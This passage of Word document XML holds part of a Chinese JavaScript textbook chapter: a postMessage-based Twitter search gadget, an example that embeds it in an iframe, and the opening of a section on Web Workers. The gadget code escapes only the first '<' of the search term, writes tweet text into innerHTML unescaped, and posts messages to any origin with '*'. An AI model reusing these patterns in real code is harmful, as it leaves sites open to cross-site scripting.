        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>escaped=searchterm.replace("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>","</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>lt;");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var html="</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"+escaped+"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h2</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(tweets.length==0){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>html+="No tweets found";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>html+="</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>dl</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>";//</w:t>
      </w:r>
      <w:r>
        <w:t>以＜</w:t>
      </w:r>
      <w:r>
        <w:t>dl</w:t>
      </w:r>
      <w:r>
        <w:t>＞列表形式呈现结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tweets.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var tweet=tweets[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text=tweet.text;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var from=tweet.from_use</w:t>
      </w:r>
      <w:r>
        <w:t>r;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var tweeturl="http://twitter.com/#!/"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>from+"/status/"+tweet.id_str;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>html+="</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>dt</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>a target='_blank'href='"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>tweeturl+"'</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"+tweet.from_user+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/a</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/dt</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>dd</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"+tweet.text+"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/dd</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>html+="</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/dl</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>设置＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞文档</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.innerHTML=html;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(functio</w:t>
      </w:r>
      <w:r>
        <w:t>n(){//</w:t>
      </w:r>
      <w:r>
        <w:t>通知内嵌</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>的页面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="2Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们（</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>）已经准备就绪</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>容器在没有收到这条消息前，它不能发送任何消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因为我们还没有准备好接收消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>通常，容器只需要等待</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件的触发，以此来得知所有的＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞都已载入完毕</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们发送消息告诉容器已经准备就绪，甚至有可能在容器获得</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件之前</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们并不知道容器的源，所以采用</w:t>
      </w:r>
      <w:r>
        <w:t>"*"</w:t>
      </w:r>
      <w:r>
        <w:t>来让浏览器把消息发送给任何窗口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">window.parent.postMessage("Twitter Search </w:t>
      </w:r>
      <w:r>
        <w:t>v0.1","*");</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/head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</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例</w:t>
      </w:r>
      <w:r>
        <w:t>22-5</w:t>
      </w:r>
      <w:r>
        <w:t>是一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>文件，可以将它引入到任何想要使用</w:t>
      </w:r>
      <w:r>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r>
        <w:t>搜索</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面中。它将</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>插入到文档中，然后为文档中所有的链接都添加一个事件处理程序，以便当鼠标指</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>针划过一个链接的时候，就会调用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，让</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>去搜索链接上的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>指定的内容。这可以允许用户在发一条包含网站内容的</w:t>
      </w:r>
      <w:r>
        <w:t>tweet</w:t>
      </w:r>
      <w:r>
        <w:t>时，在未访问该站点前就能够先看到网</w:t>
      </w:r>
      <w:r>
        <w:t>站内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-5</w:t>
      </w:r>
      <w:r>
        <w:t>：通过</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>来使用</w:t>
      </w:r>
      <w:r>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r>
        <w:t>搜索</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如下</w:t>
      </w:r>
      <w:r>
        <w:t>JS</w:t>
      </w:r>
      <w:r>
        <w:t>代码实现将</w:t>
      </w:r>
      <w:r>
        <w:t>Twitter</w:t>
      </w:r>
      <w:r>
        <w:t>搜索</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>添加到文档中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后为文档中所有的链接都添加一个事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>实现当鼠标指针划过一个链接的时候，就会调用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>让</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>去搜索链接上的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>指定的内容。这可以允许用户要发一条包含网站内容的</w:t>
      </w:r>
      <w:r>
        <w:t>tweet</w:t>
      </w:r>
      <w:r>
        <w:t>时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在未访问该站点前就能够先看到网站内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.addEventListener("load",function(){</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>以下的版本无效</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var origin="http://davidflanagan.com";//gadget</w:t>
      </w:r>
      <w:r>
        <w:t>源</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var gadget="/demos/TwitterSearch.html";//gadget</w:t>
      </w:r>
      <w:r>
        <w:t>路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var iframe=document.createElement("iframe");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>iframe.src=origin+gadget;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置它的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>iframe.width="250";//250</w:t>
      </w:r>
      <w:r>
        <w:t>个像素宽</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>iframe.height="100%";//</w:t>
      </w:r>
      <w:r>
        <w:t>整个文档高度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>iframe.style.cssFloat="right";//</w:t>
      </w:r>
      <w:r>
        <w:t>右浮动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将该</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>插入到文档的最开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.insertBefore(iframe,document.body.firstChild);//</w:t>
      </w:r>
      <w:r>
        <w:t>查找所有的链接，并把它们绑定到</w:t>
      </w:r>
      <w:r>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:t>上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var links=document.getElementsByTagName("a");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(var </w:t>
      </w:r>
      <w:r>
        <w:t>i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>links.length;i++){//addEventListener</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及其早期版本无效</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>links[i].addEventListener("mouseover",function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>作为查询内容传递</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>只当</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>仍然显示来自</w:t>
      </w:r>
      <w:r>
        <w:t>davidflanagan.com</w:t>
      </w:r>
      <w:r>
        <w:t>文档的时候传递它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>iframe.contentWindow.postMessage(this.href,origin);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="552" w:name="22_4_Web_Worker"/>
      <w:r>
        <w:t>22.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Web Worker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="552"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>客户端</w:t>
      </w:r>
      <w:r>
        <w:t>Ja</w:t>
      </w:r>
      <w:r>
        <w:t>vaScript</w:t>
      </w:r>
      <w:r>
        <w:t>其中一个基本的特性就是单线程：比如，浏览器无法同时运行两个事件处理程序，它也无法在一个事件处理程序运行的时候触发一个计时器。并行更新应用状态和文档状态根本是不可能的，客户端的程序员也不需要理解或者关心并行编程。之所以设计成单线程的理论就是，客户端的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数必须不能运行太长时间：否则会导致循环事件，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器无法对用户输入作出响应。这也是为什么</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>都是异步的，以及为什么客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>不能使用一个简单的异步</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>函数或者</w:t>
      </w:r>
      <w:r>
        <w:t>require()</w:t>
      </w:r>
      <w:r>
        <w:t>函数来加载</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Web Workers</w:t>
      </w:r>
      <w:r>
        <w:t>标准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>中，定义了解决客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>无法多线程的问题。其中定义的</w:t>
      </w:r>
      <w:r>
        <w:t>"Worker"</w:t>
      </w:r>
      <w:r>
        <w:t>是指执行代码的并行线程。不过，</w:t>
      </w:r>
      <w:r>
        <w:t>Web Workers</w:t>
      </w:r>
      <w:r>
        <w:t>处在一个自包含的执行环境中，无法访问</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象和</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象，和主线程之间的通信也只能通过异步消息传递机制来实现。这就意味着，并行地修改</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>是不可能的，不过，它提供了一种使用异步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的方式，同时允许书写需要长时间运行的函数而不会带来循环事件和导致浏览器崩溃的问题。创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>并不像打开</w:t>
      </w:r>
      <w:r>
        <w:t>一个新的浏览器窗口那样属于重量级的操作，不过，</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>本身也不是轻量级的线程，因此创建一些新的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>去处理</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>次要的操作是不划算的。这里不建议创建太多的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>（比如成百上千个），一个复杂的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用一般包含几十个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和任何线程</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:t>Web Workers</w:t>
      </w:r>
      <w:r>
        <w:t>标准包含两部分。第一部分是</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象：该对象是暴露给创建该线程的线程的。第二部分是</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>：这是一个用来表示新创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>的全局对象，也是</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程内部使用的对象。下面几节会结合例子对</w:t>
      </w:r>
      <w:r>
        <w:t>这两者一一做介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="553" w:name="22_4_1_WorkerDui_Xiang_"/>
      <w:r>
        <w:t>22.4.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="553"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>，只须使用</w:t>
      </w:r>
      <w:r>
        <w:t>Worker()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，并将指定在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>中运行的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>脚本的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>传递给该构造函数即可，如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
